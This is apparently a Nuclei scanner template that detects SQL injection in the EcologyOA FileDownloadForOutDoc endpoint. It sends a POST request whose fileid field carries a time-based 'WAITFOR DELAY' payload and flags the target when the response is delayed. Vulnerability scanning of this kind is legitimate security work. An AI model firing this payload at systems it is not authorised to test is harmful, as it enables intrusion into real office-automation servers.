id: ecology-oa-filedownloadforoutdoc-sqli

info:
  name: EcologyOA filedownloadforoutdoc - SQL injection
  author: unknown
  severity: critical
  description: EcologyOA filedownloadforoutdoc interface has SQL injection
  tags: ecology-oa,sqli

http:
  - raw:
      - |
        @timeout: 10s
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close        

        fileid={{randstr}}+WAITFOR DELAY+'0:0:7'&isFromOutImg=1
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

